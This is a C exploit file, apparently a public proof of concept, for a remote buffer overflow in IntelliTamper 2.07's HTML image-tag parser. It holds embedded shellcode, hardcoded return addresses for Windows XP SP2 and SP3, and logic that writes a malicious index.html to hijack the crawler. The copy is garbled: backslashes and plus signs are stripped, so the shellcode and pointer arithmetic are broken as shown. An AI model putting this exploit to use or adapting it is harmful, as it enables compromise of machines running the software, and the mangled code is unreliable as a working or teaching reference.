/*

* IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Expoit

*

* Discovered & Written by r0ut3r (writ3r [at] gmail.com)

* Many Thanks to Luigi Auriemma (http://aluigi.org)

*

* Greets to shinnai (http://www.shinnai.net)

* and Guido Landi

*

* IntelliTamper contains a remote buffer overflow vulnerability.

* The HTML parser, more precise the image tag fails to preform

* boundary checks on supplied data.

*

* kit:/home/r0ut3r/public_html/imgsrc-xpl # gcc -o yahh yahh.c

* kit:/home/r0ut3r/public_html/imgsrc-xpl # ./yahh 0

* [!] OS: Microsoft Windows XP Pro SP 2

* [ ] Building payload

* [ ] Inserting JMP code

* [ ] Success writing to index.html

* kit:/home/r0ut3r/public_html/imgsrc-xpl #

*/ #include <stdio.h>

#include <stdlib.h>

#include <string.h> /* win32_exec - EXITFUNC=thread CMD=c:windowssystem32calc.exe Size=184

Encoder=PexFnstenvSub http://metasploit.com

Filtered characters: 0x00 0x22 0x09 0x0a 0x0d 0x3c 0x3e */

unsigned char shellcode[] =

"x31xc9x83xe9xd8xd9xeexd9x74x24xf4x5bx81x73x13x99"

"xebx8dx6ax83xebxfcxe2xf4x65x03xc9x6ax99xebx06x2f"

"xa5x60xf1x6fxe1xeax62xe1xd6xf3x06x35xb9xeax66x23"

"x12xdfx06x6bx77xdax4dxf3x35x6fx4dx1ex9ex2ax47x67"

"x98x29x66x9exa2xbfxa9x6execx0ex06x35xbdxeax66x0c"

"x12xe7xc6xe1xc6xf7x8cx81x12xf7x06x6bx72x62xd1x4e"

"x9dx28xbcxaaxfdx60xcdx5ax1cx2bxf5x66x12xabx81xe1"

"xe9xf7x20xe1xf1xe3x66x63x12x6bx3dx6ax99xebx06x02"

"xa5xb4xbcx9cxf9xbdx04x92x1ax2bxf6x3axf1x04x43x8a"

"xf9x83x15x94x13xe5xdax95x7ex88xb7x36xeex82xe3x0e"

"xf6x9cxfex36xeax92xfex1exfcx86xbex58xc5x88xecx06"

"xfaxc5xe8x12xfcxebx8dx6a"; #define JMP 0xe9 //JMP int main(int argc, char* argv[])

{

FILE *fd;

unsigned char buff[4000],

*jmpref,

*p;

int opt; struct

{

char *os;

unsigned int eip;

} targets[] =

{

"Microsoft Windows XP Pro SP 2",

0x7d040e1f, "Microsoft Windows XP Pro SP 3",

0x7c8369f0

}; if (argc < 2)

{

printf("---------------------------------------------------------n");

printf(" IntelliTamper 2.07 Remote Buffer Overflow Expoit nn"); printf(" Discovered & Written by r0ut3r (writ3r [at] gmail.com)n");

printf(" Thanks to Luigi Auriemma (http://aluigi.org)nn"); printf(" Usage: %s <OS-type>n", argv[0]);

printf(" 0: Microsoft Windows XP Pro SP2n");

printf(" 1: Microsoft Windows XP Pro SP3n");

printf("---------------------------------------------------------n");

return 1;

} p = buff; switch (atoi(argv[1]))

{

case 0:

opt = 0;

printf("[!] OS: %sn", targets[0].os);

break; case 1:

opt = 1;

printf("[!] OS: %sn", targets[1].os);

break;

} printf("[ ] Building payloadn");

p = sprintf(p, "<img src="http://"); jmpref = p; p = sprintf(p, "%s", shellcode); int i;

int a = 3065 - (p - jmpref);

for (i=0; i < a; i )

*p = 'A'; *(unsigned int *) p = targets[opt].eip;

p = 4; printf("[ ] Inserting JMP coden"); *p = JMP;

*(unsigned int *) p = jmpref - (p 4); //JMP -(3065 4 5)

p = 4; p = sprintf(p, "">"); fd = fopen("index.html", "wb");

if (fd == NULL)

{

perror("[-] Failed opening index.htmln");

return 1;

} fwrite(buff, 1, p - buff, fd);

if (fclose(fd) == 0)

printf("[ ] Success writing to index.htmln");

else

printf("[-] Failed writing to index.htmln"); return 0;

}